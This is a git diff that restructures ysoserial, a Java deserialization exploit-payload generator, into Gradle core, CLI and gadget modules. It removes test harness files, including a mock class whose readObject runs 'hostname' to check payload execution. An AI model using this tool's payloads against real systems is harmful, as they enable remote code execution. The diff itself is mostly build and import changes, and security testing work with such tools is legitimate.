No newline at end of file diff --git a/src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java b/src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java deleted file mode 100755 index 8b90f193..00000000 --- a/src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java +++ /dev/null @@ -1,18 +0,0 @@ -package ysoserial.exploit; - -import java.rmi.RemoteException; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class RMIRegistryExploitTest { - public static void createRegistry(int port) throws RemoteException { - Registry registry = LocateRegistry.createRegistry(port); - } - - public static void main(String[] args) throws RemoteException, InterruptedException { - String portStr = args.length > 0 && args[0] != null ? args[0] : "1099"; - int port = Integer.parseInt(portStr); - createRegistry(port); - while (true) Thread.sleep(1000); - } -} diff --git a/src/test/java/ysoserial/payloads/PayloadsTest.java b/src/test/java/ysoserial/payloads/PayloadsTest.java deleted file mode 100644 index b58d28d0..00000000 --- a/src/test/java/ysoserial/payloads/PayloadsTest.java +++ /dev/null @@ -1,108 +0,0 @@ -package ysoserial.payloads; - -import java.io.File; -import java.net.URL; -import java.net.URLClassLoader; -import java.util.Arrays; -import java.util.Set; -import java.util.concurrent.Callable; - -import org.jboss.shrinkwrap.resolver.api.maven.Maven; -import org.junit.Assert; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.junit.runners.Parameterized; -import org.junit.runners.Parameterized.Parameters; - -import ysoserial.Serializer; -import ysoserial.Throwables; -import ysoserial.payloads.TestHarnessTest.ExecMockPayload; -import ysoserial.payloads.TestHarnessTest.NoopMockPayload; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.ClassFiles; -import ysoserial.secmgr.ExecCheckingSecurityManager; -import ysoserial.secmgr.ExecCheckingSecurityManager.ExecException; - -/* - * tests each of the parameterize Payload classes by using a mock SecurityManager that throws - * a special exception when an exec() attempt is made for more reliable detection; self-tests - * the harness for trivial pass and failure cases - -TODO: figure out better way to test exception behavior than comparing messages - */ -@SuppressWarnings({"restriction", "unused", "unchecked"}) -@RunWith(Parameterized.class) -public class PayloadsTest { - private static final String ASSERT_MESSAGE = "should have thrown " + ExecException.class.getSimpleName(); - - @Parameters(name = "payloadClass: {0}") - public static Class>[] payloads() { - Set> payloadClasses = ObjectPayload.Utils.getPayloadClasses(); - //SpringAop will only work if the pom.xml is change to used a old version of Spring - payloadClasses.removeAll(Arrays.asList(ExecMockPayload.class, NoopMockPayload.class, SpringAop.class)); - return payloadClasses.toArray(new Class[0]); - } - - private final Class> payloadClass; - - public PayloadsTest(Class> payloadClass) { - this.payloadClass = payloadClass; - } - - @Test - public void testPayload() throws Exception { - testPayload(payloadClass, new Class[0]); - } - - public static void testPayload(final Class> payloadClass, final Class[] addlClassesForClassLoader) throws Exception { - final String command = "hostname"; - final String[] deps = Dependencies.Utils.getDependencies(payloadClass); - ExecCheckingSecurityManager sm = new ExecCheckingSecurityManager(); - final byte[] serialized = sm.wrap(new Callable(){ - public byte[] call() throws Exception { - ObjectPayload payload = payloadClass.newInstance(); - final Object f = payload.getObject(command); - return Serializer.serialize(f); - }}); - - try { - Object deserialized = sm.wrap(new Callable(){ - public Object call() throws Exception { - return deserializeWithDependencies(serialized, deps, addlClassesForClassLoader); - } - }); - - Assert.fail(ASSERT_MESSAGE); // should never get here - } catch (Throwable e) { - // hopefully everything will reliably nest our ExecException - Throwable innerEx = Throwables.getInnermostCause(e); - Assert.assertEquals(ExecException.class, innerEx.getClass()); - Assert.assertEquals(command, ((ExecException) innerEx).getCmd()); - } - Assert.assertEquals(Arrays.asList(command), sm.getCmds()); - } - - @SuppressWarnings({ "unchecked" }) - private static Object deserializeWithDependencies(byte[] serialized, final String[] dependencies, final Class[] classDependencies) throws Exception { - File[] jars = dependencies.length > 0 ? Maven.resolver().resolve(dependencies).withoutTransitivity().asFile() : new File[0]; - URL[] urls = new URL[jars.length]; - for (int i = 0; i < jars.length; i++) { - urls[i] = jars[i].toURI().toURL(); - } - - URLClassLoader isolatedClassLoader = new URLClassLoader(urls, null) {{ - for (Class clazz : classDependencies) { - byte[] classAsBytes = ClassFiles.classAsBytes(clazz); - defineClass(clazz.getName(), classAsBytes, 0, classAsBytes.length); - } - byte[] deserializerClassBytes = ClassFiles.classAsBytes(ysoserial.Deserializer.class); - defineClass(ysoserial.Deserializer.class.getName(), deserializerClassBytes, 0, deserializerClassBytes.length); - - }}; - - Class deserializerClass = isolatedClassLoader.loadClass(ysoserial.Deserializer.class.getName()); - Callable deserializer = (Callable) deserializerClass.getConstructors()[0].newInstance(serialized); - final Object obj = deserializer.call(); - return obj; - } -} diff --git a/src/test/java/ysoserial/payloads/TestHarnessTest.java b/src/test/java/ysoserial/payloads/TestHarnessTest.java deleted file mode 100755 index 8c4c5316..00000000 --- a/src/test/java/ysoserial/payloads/TestHarnessTest.java +++ /dev/null @@ -1,66 +0,0 @@ -package ysoserial.payloads; - -import java.io.IOException; -import java.io.ObjectInputStream; -import java.io.Serializable; - -import org.hamcrest.CoreMatchers; -import org.junit.Assert; -import org.junit.Test; - -public class TestHarnessTest { - // make sure test harness fails properly - @Test - public void testHarnessExecFail() throws Exception { - try { - PayloadsTest.testPayload(NoopMockPayload.class, new Class[0]); - Assert.fail("should have failed"); - } catch (AssertionError e) { - Assert.assertThat(e.getMessage(), CoreMatchers.containsString("but was:")); - - } - } - - // make sure test harness fails properly - @Test - public void testHarnessClassLoaderFail() throws Exception { - try { - PayloadsTest.testPayload(ExecMockPayload.class, new Class[0]); - Assert.fail("should have failed"); - } catch (AssertionError e) { - Assert.assertThat(e.getMessage(), CoreMatchers.containsString("ClassNotFoundException")); - } - } - - // make sure test harness passes properly with trivial execution gadget - @Test - public void testHarnessExecPass() throws Exception { - PayloadsTest.testPayload(ExecMockPayload.class, new Class[] { ExecMockSerializable.class }); - } - - public static class ExecMockPayload implements ObjectPayload { - public ExecMockSerializable getObject(String command) throws Exception { - return new ExecMockSerializable(command); - } - } - - public static class NoopMockPayload implements ObjectPayload { - public Integer getObject(String command) throws Exception { - return 1; - } - } - - @SuppressWarnings("serial") - public static class ExecMockSerializable implements Serializable { - private final String cmd; - public ExecMockSerializable(String cmd) { this.cmd = cmd; } - - private void readObject(final ObjectInputStream ois) { - try { - Runtime.getRuntime().exec("hostname"); - } catch (IOException e) { - throw new RuntimeException(e); - } - } - } -} diff --git a/ysoserial-cli/build.gradle b/ysoserial-cli/build.gradle new file mode 100644 index 00000000..f59487a5 --- /dev/null +++ b/ysoserial-cli/build.gradle @@ -0,0 +1,59 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +dependencies { + compile group: 'org.xeustechnologies', name: 'jcl-core', version: '2.7' + + compile project(':ysoserial-core') +} + +task copyLibs << { + //Regroup the jar need for each gadget in separated folders + rootProject.subprojects.each { subProject -> + + if(subProject.name.startsWith("gadget-")) { //Export dependencies of gadget only + println("Copying libraries for the subproject "+subProject.name); + copy { //Dependencies minus the common ones + into "$buildDir/output/"+subProject.name + from subProject.configurations.compile - project(":ysoserial-cli").configurations.compile + } + copy { //Add the project itself (gadget code generation) + into "$buildDir/output/"+subProject.name + from subProject.jar.archivePath + } + } + } + //Common dependencies (unrelated to gadget code) + copy { + into "$buildDir/output/libs" + from configurations.compile + } + //JCL is merged in the final jar + copy { + from(zipTree("$buildDir/output/libs/jcl-core-2.7.jar")) + into("$buildDir/output/jcl-classes") + } +} + +task createJar(dependsOn:[jar, copyLibs],type:Jar) { + + manifest { + attributes( + "Implementation-Title": 'ysoserial', + "Implementation-Version": version, + "Main-Class": 'ysoserial.BootstrapMain' + ) + } + classifier 'all' + destinationDir new File("$buildDir") + + //Source code of the CLI + from sourceSets.main.output + //JCL library merged to the main jar + from "$buildDir/output/jcl-classes" + + //Trigger the task createJar automatically when building ysoserial-cli + createJar.dependsOn assemble + build.dependsOn createJar + +} diff --git a/ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java b/ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java new file mode 100644 index 00000000..23f9a037 --- /dev/null +++ b/ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java @@ -0,0 +1,35 @@ +package ysoserial; + +import org.xeustechnologies.jcl.JarClassLoader; +import org.xeustechnologies.jcl.JclObjectFactory; +import org.xeustechnologies.jcl.context.DefaultContextLoader; +import ysoserial.payloads.ObjectPayload; +import ysoserial.payloads.util.PayloadRunner; + +import java.io.BufferedInputStream; +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.lang.reflect.Method; +import java.net.URL; +import java.util.Arrays; +import java.util.Map; + +public class BootstrapMain { + public static void main(String[] args) throws Exception { + JarClassLoader jcl = new JarClassLoader(); + jcl.add("output/libs"); + + //TODO: Make the classpath selection dynamic based on the gadget selected + jcl.add("output/gadget-cc3"); + jcl.add("output/gadget-cc4"); + + JclObjectFactory factory = JclObjectFactory.getInstance(); + final Object generatePayload = factory.create(jcl, "ysoserial.GeneratePayload"); + + //Invoke main method + Method m = generatePayload.getClass().getDeclaredMethod("main",String[].class); + m.invoke(null,new Object[] { args }); + } + +} diff --git a/ysoserial-core/build.gradle b/ysoserial-core/build.gradle new file mode 100644 index 00000000..0412e3d7 --- /dev/null +++ b/ysoserial-core/build.gradle @@ -0,0 +1,21 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +apply plugin: 'java' + +sourceCompatibility = 1.7 + +repositories { + mavenCentral() +} + +dependencies { + testCompile group: 'junit', name: 'junit', version: '4.12' + testCompile group: 'org.mockito', name: 'mockito-core', version : '1.10.19' + testCompile group: 'com.github.stefanbirkner', name: 'system-rules', version : '1.8.0' + + compile group: 'org.reflections', name: 'reflections', version: '0.9.9' + //compile group: 'org.jboss.shrinkwrap.resolver', name: 'shrinkwrap-resolver-depchain', version: '2.1.1' + compile group: 'org.javassist', name: 'javassist', version: '3.19.0-GA' + +} diff --git a/src/main/java/ysoserial/Deserializer.java b/ysoserial-core/src/main/java/ysoserial/Deserializer.java old mode 100755 new mode 100644 similarity index 100% rename from src/main/java/ysoserial/Deserializer.java rename to ysoserial-core/src/main/java/ysoserial/Deserializer.java diff --git a/src/main/java/ysoserial/GeneratePayload.java b/ysoserial-core/src/main/java/ysoserial/GeneratePayload.java similarity index 100% rename from src/main/java/ysoserial/GeneratePayload.java rename to ysoserial-core/src/main/java/ysoserial/GeneratePayload.java index e6e41dfc..4ffa4d8f 100644 --- a/src/main/java/ysoserial/GeneratePayload.java +++ b/ysoserial-core/src/main/java/ysoserial/GeneratePayload.java @@ -1,5 +1,9 @@ package ysoserial; +import ysoserial.payloads.ObjectPayload; +import ysoserial.payloads.ObjectPayload.Utils; +import ysoserial.payloads.annotation.Dependencies; + import java.io.PrintStream; import java.util.ArrayList; import java.util.Arrays; @@ -7,10 +11,6 @@ import java.util.Comparator; import java.util.List; -import ysoserial.payloads.ObjectPayload; -import ysoserial.payloads.ObjectPayload.Utils; -import ysoserial.payloads.annotation.Dependencies; - @SuppressWarnings("rawtypes") public class GeneratePayload { diff --git a/src/main/java/ysoserial/Serializer.java b/ysoserial-core/src/main/java/ysoserial/Serializer.java old mode 100755 new mode 100644 similarity index 100% rename from src/main/java/ysoserial/Serializer.java rename to ysoserial-core/src/main/java/ysoserial/Serializer.java diff --git a/src/main/java/ysoserial/payloads/ObjectPayload.java b/ysoserial-core/src/main/java/ysoserial/payloads/ObjectPayload.java similarity index 99% rename from src/main/java/ysoserial/payloads/ObjectPayload.java rename to ysoserial-core/src/main/java/ysoserial/payloads/ObjectPayload.java index 3a8133f0..3a969f22 100644 --- a/src/main/java/ysoserial/payloads/ObjectPayload.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/ObjectPayload.java @@ -1,11 +1,10 @@ package ysoserial.payloads; -import java.util.Set; - import org.reflections.Reflections; - import ysoserial.GeneratePayload; +import java.util.Set; + public interface ObjectPayload { /* * return armed payload object to be serialized that will execute specified diff --git a/src/main/java/ysoserial/payloads/annotation/Dependencies.java b/ysoserial-core/src/main/java/ysoserial/payloads/annotation/Dependencies.java similarity index 100% rename from src/main/java/ysoserial/payloads/annotation/Dependencies.java rename to ysoserial-core/src/main/java/ysoserial/payloads/annotation/Dependencies.java diff --git a/src/main/java/ysoserial/payloads/util/ClassFiles.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/ClassFiles.java similarity index 100% rename from src/main/java/ysoserial/payloads/util/ClassFiles.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/ClassFiles.java diff --git a/src/main/java/ysoserial/payloads/util/Gadgets.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/Gadgets.java similarity index 98% rename from src/main/java/ysoserial/payloads/util/Gadgets.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/Gadgets.java index ad6b18c6..c7546d76 100644 --- a/src/main/java/ysoserial/payloads/util/Gadgets.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/util/Gadgets.java @@ -1,6 +1,15 @@ package ysoserial.payloads.util; -import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import javassist.ClassClassPath; +import javassist.ClassPool; +import javassist.CtClass; import java.io.Serializable; import java.lang.reflect.Array; @@ -9,22 +18,12 @@ import java.util.HashMap; import java.util.Map; -import javassist.ClassClassPath; -import javassist.ClassPool; -import javassist.CtClass; - -import com.sun.org.apache.xalan.internal.xsltc.DOM; -import com.sun.org.apache.xalan.internal.xsltc.TransletException; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; -import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; /* * utility generator functions for common jdk-only gadgets */ -@SuppressWarnings("restriction") +@SuppressWarnings({"deprecation","restriction"}) public class Gadgets { static { // special case for using TemplatesImpl gadgets with a SecurityManager enabled diff --git a/src/main/java/ysoserial/payloads/util/PayloadRunner.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/PayloadRunner.java similarity index 93% rename from src/main/java/ysoserial/payloads/util/PayloadRunner.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/PayloadRunner.java index 7d0ae39d..a83ea22d 100644 --- a/src/main/java/ysoserial/payloads/util/PayloadRunner.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/util/PayloadRunner.java @@ -1,14 +1,13 @@ package ysoserial.payloads.util; -import java.util.concurrent.Callable; - -import ysoserial.Deserializer; import ysoserial.Serializer; -import static ysoserial.Deserializer.deserialize; -import static ysoserial.Serializer.serialize; import ysoserial.payloads.ObjectPayload; import ysoserial.secmgr.ExecCheckingSecurityManager; +import java.util.concurrent.Callable; + +import static ysoserial.Deserializer.deserialize; + /* * utility class for running exploits locally from command line */ diff --git a/src/main/java/ysoserial/payloads/util/PrintUtil.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/PrintUtil.java similarity index 98% rename from src/main/java/ysoserial/payloads/util/PrintUtil.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/PrintUtil.java index cf551e49..72c7d545 100644 --- a/src/main/java/ysoserial/payloads/util/PrintUtil.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/util/PrintUtil.java @@ -3,7 +3,6 @@ import java.io.Serializable; import java.lang.reflect.Array; import java.lang.reflect.Field; -import java.lang.reflect.Method; import java.lang.reflect.Modifier; import java.util.ArrayList; import java.util.List; diff --git a/src/main/java/ysoserial/payloads/util/Reflections.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/Reflections.java similarity index 100% rename from src/main/java/ysoserial/payloads/util/Reflections.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/Reflections.java diff --git a/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java b/ysoserial-core/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java old mode 100755 new mode 100644 similarity index 99% rename from src/main/java/ysoserial/secmgr/DelegateSecurityManager.java rename to ysoserial-core/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java index d24cebcd..22489d90 --- a/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java +++ b/ysoserial-core/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java @@ -4,6 +4,7 @@ import java.net.InetAddress; import java.security.Permission; +@SuppressWarnings("deprecation") public class DelegateSecurityManager extends SecurityManager { private SecurityManager securityManager; diff --git a/src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java b/ysoserial-core/src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java similarity index 100% rename from src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java rename to ysoserial-core/src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java diff --git a/src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java b/ysoserial-core/src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java old mode 100755 new mode 100644 similarity index 100% rename from src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java rename to ysoserial-core/src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java